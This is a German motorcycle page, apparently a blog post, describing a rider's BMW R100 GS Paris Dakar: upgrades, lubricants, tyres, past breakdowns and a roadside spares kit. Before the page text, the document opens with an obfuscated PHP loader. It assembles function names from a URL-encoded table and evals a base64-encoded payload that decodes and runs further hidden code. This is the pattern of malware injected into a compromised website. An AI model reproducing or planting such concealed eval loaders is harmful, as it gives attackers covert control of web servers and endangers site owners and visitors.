$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iVnNCVEFFYml1aFN4S05sT3dYREpmZ0lucVJ2ZXpqWkZrcldVdHlNUENZR0xRb2NhcG1kSEFreVVNcUZWSXNUbHRoYWVnY1lLcmltQkNKTHZuWmp4UldmUHBHWHViZEVRem9TSHdORE91WTlnSE9NaVl6bz0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> BMW R100 GS Paris Dakar – Mark van den Hof

MY: 01.1992, 1000cc , 44kW/ 60ps

Was sich im laufe der Jähren bewährt hat:

Ein Siebenrock kurzen 1e gang  (-5%), Silent Hektik dualplug Zündung , Öhlins Federbein, Wilbers  progressive Gabelfedern, eine Kardanwelle von Andreas „Fernreiseteile“, diese ist Abschmierbar und die Kreuzgelenke sind austauschbar, Silent Hektik Lima-Kontroller, einteilige ventilbocken (2V-forum), Die Leichte Ventil einstellschrauben von Q-Tech, Paris Dakar Benzintank mit 34 Liter Inhalt, Ermax Windschutzscheibe (+10cm)

 


Alternative zum Original Batterie: Kung Long 18-12V (5,6kg)  oder ML-LFP14 Lithium 12V (0,8kg)

  • Motor: 10W50 Ligui Moly Full Synthetisch (2,5 Liter)
  • Getriebe: Castrol MTX, SAE 75w140 GL-5 (0,8 Liter)
  • HAG/Antieb: Castrol MTX, SAE 75w140 GL-5 (0,26Liter)
  • Gabel: Wilbers SAE 7,5  (L 0,47/R 0,47)

Heidenau K60 Scout M/S TL

Mitas E09 Dakar TL

  heidenau scout 

  1. Links im Bild: Unsere #Heidenau k60 Scout mit 20.000km Laufleistung
  2. Mitte: #Heidenau k60 Scout/#Mitas E09 Dakar
  3. Rechts: Ein super Allrounder, die Heidenau k60 Scout in die Iranische wüste

Was bis jetzt kaputt war…

  • 2x BMW Kardan Welle
  • Feldgehause anlasser
  • Getriebe Lager
  • 3x Getriebe Ausgang dichtung
  • 2x Diodeplatte
  • Lenkkopflager
  • Rotor der Lichtmachine
  • BMW Federbein
  • Orginal Zündspulle

#Notfall Werkzeug und ersatzteilen für unterwegs:

Luftkompressor, Reifenreparatursatz für TL reifen, Gearshifter für das Boxergetriebe, Dichtungen für das Getriebe, 4x Ventildeckel Dichtungen, O-ringen für die ölablassschrauben, 1x Ölfilter, 4stuck Ersatz Speichen, 2x Benzin Filter, 2x Sekonden Kleber, Multi Meter, Zündkerze und Zündkerzen Stecker, Ersatz Birnen H4 und Rücklicht, 4x Sicherungen (blau), Abschleppseil, Motoröl nach bedarf.

Ein Siebenrock Anker/Rotor für die Original Lichtmaschine, eine Kardanwelle und ein Ersatz Getriebe liegen immer zuhause versandbereit verpackt.